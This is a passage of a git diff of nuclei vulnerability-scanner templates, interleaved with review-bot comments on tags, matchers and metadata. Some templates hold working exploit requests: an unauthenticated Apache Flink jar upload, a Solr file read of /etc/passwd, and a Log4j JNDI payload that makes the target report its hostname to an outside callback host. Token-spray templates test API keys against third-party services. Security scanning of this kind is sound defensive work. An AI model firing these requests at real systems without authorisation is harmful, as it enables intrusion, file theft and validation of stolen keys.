condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/apache-flink-unauth-rce.yaml b/nuclei-templates/Other/apache-flink-unauth-rce.yaml deleted file mode 100644 index 196536f66e..0000000000 --- a/nuclei-templates/Other/apache-flink-unauth-rce.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: apache-flink-unauth-rce -info: - name: Apache Flink Unauth RCE - author: pikpikcu - severity: critical - tags: apache,flink,rce,intrusive,unauth - reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce -requests: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-guacamole-361.yaml b/nuclei-templates/Other/apache-guacamole.yaml similarity index 100% rename from nuclei-templates/Other/apache-guacamole-361.yaml rename to nuclei-templates/Other/apache-guacamole.yaml diff --git a/nuclei-templates/Other/apache-nifi-rce.yaml b/nuclei-templates/Other/apache-nifi-rce.yaml deleted file mode 100644 index b3f77b6915..0000000000 --- a/nuclei-templates/Other/apache-nifi-rce.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: Apache-NiFi-rce - -info: - name: Apache NiFi系统API命令执行 - author: Str1am - severity: high - reference: https://github.com/imjdl/Apache-NiFi-Api-RCE/blob/master/exp.py - tags: NiFi,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/nifi-api/access/config" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "supportsLogin" - - "config" - - "true" - part: body - condition: and 
diff --git a/nuclei-templates/Other/apache-solr-file-read-368.yaml b/nuclei-templates/Other/apache-solr-file-read-368.yaml deleted file mode 100644 index 8af1e2bc32..0000000000 --- a/nuclei-templates/Other/apache-solr-file-read-368.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: apache-solr-file-read - -info: - name: Apache Solr <= 8.8.1 Arbitrary File Read - author: DhiyaneshDk - severity: high - tags: apache,solr,lfi - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" \ No newline at end of file diff --git a/nuclei-templates/Other/apache-solr-file-read.yaml b/nuclei-templates/Other/apache-solr-file-read.yaml new file mode 100644 index 0000000000..0f545b712a --- /dev/null +++ b/nuclei-templates/Other/apache-solr-file-read.yaml 
@@ -0,0 +1,37 @@ +id: apache-solr-file-read +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml b/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml new file mode 100644 index 0000000000..677d4dec7f --- /dev/null +++ b/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml 
@@ -0,0 +1,43 @@ +id: apache-solr-log4j-rce +info: + name: Apache Solr 7+ - Log4j Remote Code Execution + author: Evan Rubinstein,nvn1729 + severity: critical + description: | + Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + reference: + - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 + - https://twitter.com/sirifu4k1/status/1470011568834424837 + - https://github.com/apache/solr/pull/454 + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + metadata: + verified: true + shodan-query: http.html:"Apache Solr" + tags: cve,cve2021,solr,oast,log4j,rce,apache,jndi +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by mp on 2022/05/27 diff --git a/nuclei-templates/Other/apache-solr-log4j-rce.yaml b/nuclei-templates/Other/apache-solr-log4j-rce.yaml deleted file mode 100644 index 9a19f69c70..0000000000 --- a/nuclei-templates/Other/apache-solr-log4j-rce.yaml +++ /dev/null 
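Review bot: The classification block in apache-solr-log4j-rce-372 omits `cve-id: CVE-2021-44228` even though the template now carries `cve,cve2021` tags and links the NVD entry; add `cve-id: CVE-2021-44228` so the finding is keyed to the CVE in output and filtering. `cwe-id: CWE-77` (command injection) is also off; the weakness NVD records for CVE-2021-44228 is CWE-917 (Expression Language injection), with CWE-502 as the secondary. The matcher confirms only a DNS interaction from the JNDI lookup, not code execution, which the description could say explicitly so the `rce` result is read as "vulnerable lookup triggered".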
@@ -1,31 +0,0 @@ -id: apache-solr-log4j-rce -info: - name: Apache Solr Log4j JNDI RCE - author: Evan Rubinstein,nvn1729 - severity: critical - description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. - reference: - - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - - https://twitter.com/sirifu4k1/status/1470011568834424837 - - https://github.com/apache/solr/pull/454 - tags: solr,oast,log4j,rce,apache,jndi -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/nuclei-templates/Other/Apache-solr-unauth.yaml b/nuclei-templates/Other/apache-solr-unauth.yaml similarity index 100% rename from nuclei-templates/Other/Apache-solr-unauth.yaml rename to nuclei-templates/Other/apache-solr-unauth.yaml diff --git a/nuclei-templates/Other/apache-tomcat-snoop-375.yaml b/nuclei-templates/Other/apache-tomcat-snoop-375.yaml deleted file mode 100644 index 9cb1ec5328..0000000000 --- a/nuclei-templates/Other/apache-tomcat-snoop-375.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: apache-tomcat-snoop - -info: - name: Apache Tomcat example page disclosure - snoop - author: pdteam - severity: low - description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. - reference: - - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks - tags: apache,misconfig,tomcat,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - 'Request URI: /examples/jsp/snp/snoop.jsp' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-tomcat-snoop-377.yaml b/nuclei-templates/Other/apache-tomcat-snoop-377.yaml new file mode 100644 index 0000000000..15b5a1beab --- /dev/null +++ b/nuclei-templates/Other/apache-tomcat-snoop-377.yaml @@ -0,0 +1,24 @@ +id: apache-tomcat-snoop + +info: + name: Apache Tomcat example page disclosure - snoop + author: pdteam + severity: low + description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. + reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks + tags: apache + +requests: + - method: GET + path: + - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - 'Request URI: /examples/jsp/snp/snoop.jsp' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/apc_info.yaml b/nuclei-templates/Other/apc-info-380.yaml similarity index 100% rename from nuclei-templates/Other/apc_info.yaml rename to nuclei-templates/Other/apc-info-380.yaml 
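Review bot: The `tags: apache` line in the new `apache-tomcat-snoop-377.yaml` drops `misconfig,tomcat,disclosure`, so a run filtered with `-tags tomcat` or `-tags misconfig` no longer picks this check up; the file being deleted alongside it carried `tags: apache,misconfig,tomcat,disclosure`. I'd restore that list and keep `reference:` as a YAML list, as the other templates in this change do. The new file also ends without a trailing newline (`\ No newline at end of file`).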
diff --git a/nuclei-templates/Other/apc-ups-login-381.yaml b/nuclei-templates/Other/apc-ups-login-381.yaml deleted file mode 100644 index 3573ace00e..0000000000 --- a/nuclei-templates/Other/apc-ups-login-381.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: apc-ups-login -info: - name: APC UPS Login - author: droberson - severity: info - metadata: - shodan-query: title:"APC | Log On" - tags: iot,panel -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apc-ups-login-382.yaml b/nuclei-templates/Other/apc-ups-login-382.yaml new file mode 100644 index 0000000000..f28e384f2c --- /dev/null +++ b/nuclei-templates/Other/apc-ups-login-382.yaml @@ -0,0 +1,24 @@ +id: apc-ups-login + +info: + name: APC UPS Login + author: droberson + severity: info + reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + tags: iot,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/logon.htm" + + matchers-condition: and + matchers: + - type: word + words: + - 'APC | Log On' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-abstractapi-383.yaml b/nuclei-templates/Other/api-abstractapi-383.yaml deleted file mode 100644 index def3b63a7a..0000000000 --- a/nuclei-templates/Other/api-abstractapi-383.yaml +++ /dev/null 
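Review bot: Only a Shodan search URL under `reference:` now records the fingerprint query; the `metadata:` / `shodan-query: title:"APC | Log On"` pair that the deleted `apc-ups-login-381.yaml` carried is gone from the new `apc-ups-login-382.yaml`. Tooling that builds target lists from templates (nuclei's uncover integration, if I remember correctly) reads the `shodan-query` metadata key, not reference URLs, so I'd keep both: the reference for humans and the `metadata:` block for automation.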
@@ -1,22 +0,0 @@ -id: api-abstractapi -info: - name: Abstract Api Public Holidays Test - author: daffainfo - severity: info - reference: - - https://www.abstractapi.com/holidays-api - - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md - tags: token-spray,abstractapi -self-contained: true -requests: - - method: GET - path: - - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" - matchers: - - type: word - part: body - words: - - '"name_local":' - - '"location":' - - '"date_year":' - condition: and diff --git a/nuclei-templates/Other/api-abstractapi.yaml b/nuclei-templates/Other/api-abstractapi.yaml new file mode 100644 index 0000000000..b6eecac2ef --- /dev/null +++ b/nuclei-templates/Other/api-abstractapi.yaml @@ -0,0 +1,25 @@ +id: api-abstractapi + +info: + name: Abstract Api Public Holidays Test + author: daffainfo + severity: info + reference: + - https://www.abstractapi.com/holidays-api + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md + tags: token-spray,abstractapi + +self-contained: true +requests: + - method: GET + path: + - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" + + matchers: + - type: word + part: body + words: + - '"total_count":' + - '"limit":' + - '"offset":' + condition: and diff --git a/nuclei-templates/Other/api-adafruit-io-387.yaml b/nuclei-templates/Other/api-adafruit-io-387.yaml new file mode 100644 index 0000000000..5eba45190d --- /dev/null +++ b/nuclei-templates/Other/api-adafruit-io-387.yaml 
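Review bot: The matcher in the new `api-abstractapi.yaml` requires `"total_count":`, `"limit":` and `"offset":` in the body, but the request hits the holidays endpoint (`holidays.abstractapi.com/v1/`), whose documented response is a list of holiday objects with fields such as `name_local`, `location` and `date_year` — exactly the keys the deleted `api-abstractapi-383.yaml` matched on. Unless a live response shows those pagination keys, this template will never fire for a valid key, so please verify one authenticated call before keeping the new words. If the keys really do differ, the `reference:` link should point at the endpoint whose envelope they come from.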
@@ -0,0 +1,22 @@ +id: api-adafruit-io +info: + name: Adafruit IO API Test + author: dwisiswant0 + severity: info + reference: + - https://io.adafruit.com/api/docs/ + tags: token-spray,adafruit +self-contained: true +requests: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + headers: + X-AIO-Key: "{{token}}" + matchers: + - type: word + part: body + words: + - '"username":' + - '"id":' + condition: and diff --git a/nuclei-templates/Other/api-adafruit-io.yaml b/nuclei-templates/Other/api-adafruit-io.yaml deleted file mode 100644 index 5fc0e8d40c..0000000000 --- a/nuclei-templates/Other/api-adafruit-io.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-adafruit-io - -info: - name: Adafruit IO API Test - author: dwisiswant0 - severity: info - reference: https://io.adafruit.com/api/docs/ - tags: token-spray,adafruit - -self-contained: true -requests: - - method: GET - path: - - "https://io.adafruit.com/api/v2/user" - headers: - X-AIO-Key: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"username":' - - '"id":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-alienvault-389.yaml b/nuclei-templates/Other/api-alienvault-389.yaml new file mode 100644 index 0000000000..8bfd4447da --- /dev/null +++ b/nuclei-templates/Other/api-alienvault-389.yaml @@ -0,0 +1,26 @@ +id: api-alienvault + +info: + name: AlienVault Open Threat Exchange (OTX) API Test + author: daffainfo + severity: info + reference: + - https://otx.alienvault.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md + tags: token-spray,alienvault + +self-contained: true +requests: + - raw: + - | + GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 + Host: otx.alienvault.com + X-OTX-API-KEY: {{token}} + + matchers: + - type: word + part: body + words: + - '"$schema":' + - '"properties":' + condition: and 
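Review bot: The matcher in `api-alienvault-389.yaml` asserts `"$schema":` and `"properties":` in the body of `/api/v1/pulses/subscribed`; those are JSON-Schema keys rather than fields I'd expect in a pulse listing (the OTX docs describe a paginated `results` list), so a valid key may never match. I can't confirm the envelope from here, so please check one authenticated response and match on a stable key such as `'"results":'` plus `'"count":'` with `condition: and`, or pair the word matcher with a status check for 200.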
diff --git a/nuclei-templates/Other/api-alienvault-390.yaml b/nuclei-templates/Other/api-alienvault-390.yaml deleted file mode 100644 index d0e5ba33ae..0000000000 --- a/nuclei-templates/Other/api-alienvault-390.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md - tags: token-spray,alienvault,exchange - -self-contained: true -requests: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and diff --git a/nuclei-templates/Other/api-asana.yaml b/nuclei-templates/Other/api-asana.yaml deleted file mode 100644 index 9608f3c236..0000000000 --- a/nuclei-templates/Other/api-asana.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-asana - -info: - name: Asana API Test - author: zzeitlin - reference: https://developers.asana.com/docs/using-terminal - severity: info - tags: token-spray,asana - -self-contained: true -requests: - - method: GET - path: - - "https://app.asana.com/api/1.0/users/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'data:' - - 'email' - - 'name' - condition: and diff --git a/nuclei-templates/Other/api-bible-394.yaml b/nuclei-templates/Other/api-bible-394.yaml deleted file mode 100644 index 85858a2c68..0000000000 --- a/nuclei-templates/Other/api-bible-394.yaml +++ /dev/null 
@@ -1,24 +0,0 @@
-id: api-bible
-info:
- name: API.Bible API Test
- author: daffainfo
- severity: info
- reference:
- - https://docs.api.bible
- - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md
- tags: token-spray,bible
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3"
- headers:
- api-key: "{{token}}"
- matchers:
- - type: word
- part: body
- words:
- - "orgId"
- - "bookId"
- - "bibleId"
- condition: and
diff --git a/nuclei-templates/Other/api-bible.yaml b/nuclei-templates/Other/api-bible.yaml
new file mode 100644
index 0000000000..9e47277d90
--- /dev/null
+++ b/nuclei-templates/Other/api-bible.yaml
@@ -0,0 +1,28 @@
+id: api-bible
+
+info:
+ name: API.Bible API Test
+ author: daffainfo
+ severity: info
+ description: Everything you need from the Bible in one discoverable place
+ reference:
+ - https://docs.api.bible
+ - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible
+ tags: token-spray,bible
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3"
+ headers:
+ api-key: "{{token}}"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "orgId"
+ - "bookId"
+ - "bibleId"
+ condition: and
diff --git a/nuclei-templates/Other/api-bitly.yaml b/nuclei-templates/Other/api-bitly.yaml
new file mode 100644
index 0000000000..1764877c04
--- /dev/null
+++ b/nuclei-templates/Other/api-bitly.yaml
@@ -0,0 +1,17 @@
+id: api-bitly
+info:
+ name: Bitly API Test
+ author: zzeitlin
+ reference: https://dev.bitly.com/api-reference
+ severity: info
+ tags: token-spray,bitly
+requests:
+ - method: GET
+ path:
+ - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com"
+ matchers:
+ - type: word
+ part: body
+ negative: true
+ words:
+ - 'INVALID_ARG_ACCESS_TOKEN'
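Review bot: The only matcher in `api-bitly.yaml` is `negative: true` on `INVALID_ARG_ACCESS_TOKEN`, so any response that lacks that string — a 5xx, a rate-limit page, an HTML error from the v3 API that Bitly has, as far as I know, deprecated — is reported as a valid token. The request also calls `/v3/shorten`, which creates a bitlink in the token owner's account, a write action a credential check should avoid; a read-only call such as `GET https://api-ssl.bitly.com/v4/user` with `Authorization: Bearer {{token}}` and a positive matcher on a key such as `'"login":'` would validate the token without leaving a trace. The template also lacks `self-contained: true`, unlike the other absolute-URL token-spray templates in this change.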
diff --git a/nuclei-templates/Other/api-block-400.yaml b/nuclei-templates/Other/api-block-400.yaml deleted file mode 100644 index 9609fdbafb..0000000000 --- a/nuclei-templates/Other/api-block-400.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-block -info: - name: block.io API Test - author: daffainfo - severity: info - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md - tags: token-spray,block -self-contained: true -requests: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and diff --git a/nuclei-templates/Other/api-block.yaml b/nuclei-templates/Other/api-block.yaml new file mode 100644 index 0000000000..616a67dd9f --- /dev/null +++ b/nuclei-templates/Other/api-block.yaml @@ -0,0 +1,26 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + description: Bitcoin Payment, Wallet & Transaction Data + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/tree/main/block + tags: token-spray,block + +self-contained: true +requests: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and diff --git a/nuclei-templates/Other/api-blockchain-398.yaml b/nuclei-templates/Other/api-blockchain-398.yaml new file mode 100644 index 0000000000..ab15d9dace --- /dev/null +++ b/nuclei-templates/Other/api-blockchain-398.yaml 
@@ -0,0 +1,28 @@ +id: api-blockchain +info: + name: Blockchain API Test + author: daffainfo + severity: info + reference: + - https://api.blockchain.com/v3/#/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md + classification: + cwe-id: CWE-200 + tags: token-spray,blockchain +self-contained: true +requests: + - raw: + - | + GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 + Host: api.blockchain.com + X-API-Token: {{token}} + matchers: + - type: word + part: body + words: + - '"currency"' + - '"balance"' + - '"available"' + condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/api-blockchain.yaml b/nuclei-templates/Other/api-blockchain.yaml deleted file mode 100644 index 4f027d84d3..0000000000 --- a/nuclei-templates/Other/api-blockchain.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-blockchain - -info: - name: Blockhain API Test - author: daffainfo - severity: info - reference: - - https://api.blockchain.com/v3/#/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md - tags: token-spray,blockchain - -self-contained: true -requests: - - raw: - - | - GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 - Host: api.blockchain.com - X-API-Token: {{token}} - - matchers: - - type: word - part: body - words: - - '"currency"' - - '"balance"' - - '"available"' - condition: and diff --git a/nuclei-templates/Other/api-buildkite.yaml b/nuclei-templates/Other/api-buildkite.yaml index 7855f0b53b..fe68654528 100644 --- a/nuclei-templates/Other/api-buildkite.yaml +++ b/nuclei-templates/Other/api-buildkite.yaml 
@@ -1,25 +1,18 @@
 id: api-buildkite
-
 info:
 name: Buildkite API Test
 author: zzeitlin
 reference: https://buildkite.com/docs/apis/rest-api/user
 severity: info
 tags: token-spray,buildkite
-
-self-contained: true
 requests:
 - method: GET
 path:
 - "https://api.buildkite.com/v2/user"
 headers:
 Authorization: Bearer {{token}}
-
 matchers:
- - type: word
- part: body
- words:
- - '"id":'
- - '"graphql_id":'
- - '"email":'
- condition: and
\ No newline at end of file
+ - type: status
+ status:
+ - 401
+ negative: true
diff --git a/nuclei-templates/Other/api-buttercms-403.yaml b/nuclei-templates/Other/api-buttercms-403.yaml
deleted file mode 100644
index cb2e1f1638..0000000000
--- a/nuclei-templates/Other/api-buttercms-403.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: api-buttercms
-info:
- name: ButterCMS API Test
- author: zzeitlin
- reference: https://buttercms.com/docs/api/#introduction
- severity: info
- tags: token-spray,buttercms
-requests:
- - method: GET
- path:
- - "https://api.buttercms.com/v2/posts/?auth_token={{token}}"
- matchers:
- - type: status
- status:
- - 401
- negative: true
diff --git a/nuclei-templates/Other/api-calendly-404.yaml b/nuclei-templates/Other/api-calendly-404.yaml
index 648bfea8b1..aabbafcdce 100644
--- a/nuclei-templates/Other/api-calendly-404.yaml
+++ b/nuclei-templates/Other/api-calendly-404.yaml
@@ -1,17 +1,25 @@
 id: api-calendly
+
 info:
 name: Calendly API Test
 author: zzeitlin
 reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me
 severity: info
- tags: token-spray,calendly
+
+
+self-contained: true
 requests:
 - method: GET
 path:
 - "https://calendly.com/api/v1/users/me"
 headers:
 X-Token: "{{token}}"
+
 matchers:
- - type: status
- status:
- - 200
+ - type: word
+ part: body
+ words:
+ - '"data":'
+ - '"id":'
+ - '"email":'
+ condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/api-circleci-405.yaml b/nuclei-templates/Other/api-circleci-405.yaml
new file mode 100644
index 0000000000..4d0fc2c4cd
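Review bot: The new matcher in `api-buildkite.yaml` — `- type: status` / `- 401` / `negative: true` — accepts every response other than 401, including 403, 429, 5xx and proxy error pages, so tokens that were never validated will now be reported; the three body words it replaces (`"id":`, `"graphql_id":`, `"email":`) were the stronger signal. The hunk also removes `self-contained: true` while leaving an absolute URL in `path:`, which as I understand nuclei's model makes it demand a target list for a request that never uses `{{BaseURL}}`. I'd keep `self-contained: true` and a positive body matcher, or at minimum combine the negative 401 check with a positive `status: 200` under `matchers-condition: and`.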
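Review bot: The calendly hunk deletes `tags: token-spray,calendly` and leaves two blank lines in its place, so this template silently drops out of every `-tags token-spray` run the rest of the set relies on; the new body matcher and `self-contained: true` are fine, but the tag line should come back as `  tags: token-spray,calendly` under `info:`. The file is also left without a trailing newline.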
--- /dev/null +++ b/nuclei-templates/Other/api-circleci-405.yaml @@ -0,0 +1,15 @@ +id: api-circleci +info: + name: CircleCI API Test + author: zzeitlin + reference: https://circleci.com/docs/api/v1 + severity: info + tags: token-spray,circle,circleci +requests: + - method: GET + path: + - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-coinapi-408.yaml b/nuclei-templates/Other/api-coinapi-408.yaml new file mode 100644 index 0000000000..12c7339245 --- /dev/null +++ b/nuclei-templates/Other/api-coinapi-408.yaml @@ -0,0 +1,24 @@ +id: api-coinapi +info: + name: CoinAPI API Test + author: daffainfo + severity: info + reference: + - https://docs.coinapi.io/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinAPI.md + tags: token-spray,coinapi +self-contained: true +requests: + - raw: + - | + GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 + Host: rest.coinapi.io + X-CoinAPI-Key: {{token}} + matchers: + - type: word + part: body + words: + - '"exchange_id":' + - '"website":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-coinapi.yaml b/nuclei-templates/Other/api-coinapi.yaml deleted file mode 100644 index e4a2e44374..0000000000 --- a/nuclei-templates/Other/api-coinapi.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-coinapi - -info: - name: CoinAPI API Test - author: daffainfo - severity: info - description: All Currency Exchanges integrate under a single api - reference: - - https://docs.coinapi.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - tags: token-spray,coinapi - -self-contained: true -requests: - - raw: - - | - GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 - Host: rest.coinapi.io - X-CoinAPI-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"exchange_id":' - - '"website":' - - '"name":' - condition: and 
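Review bot: `api-circleci-405.yaml` treats any HTTP 200 from `/api/v1.1/me?circle-token={{token}}` as a valid token, but a 200 carrying an HTML interstitial or an error body from an intermediary passes just as well; match on a key from the `me` response such as `'"login":'` alongside the status. The template also lacks `self-contained: true`, which its siblings with absolute URLs carry, and it sends the token in the query string where it lands in access logs — CircleCI accepts a `Circle-Token` header instead, as far as I recall.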
diff --git a/nuclei-templates/Other/api-cooperhewitt-409.yaml b/nuclei-templates/Other/api-cooperhewitt-409.yaml deleted file mode 100644 index c54d64e093..0000000000 --- a/nuclei-templates/Other/api-cooperhewitt-409.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-cooperhewitt - -info: - name: Cooper Hewitt API - author: daffainfo - severity: info - reference: - - https://collection.cooperhewitt.org/api/methods/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md - tags: token-spray,cooperhewitt - -self-contained: true -requests: - - method: GET - path: - - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-cooperhewitt-410.yaml b/nuclei-templates/Other/api-cooperhewitt-410.yaml new file mode 100644 index 0000000000..0da30b58ee --- /dev/null +++ b/nuclei-templates/Other/api-cooperhewitt-410.yaml @@ -0,0 +1,25 @@ +id: api-cooperhewitt + +info: + name: Cooper Hewitt API + author: 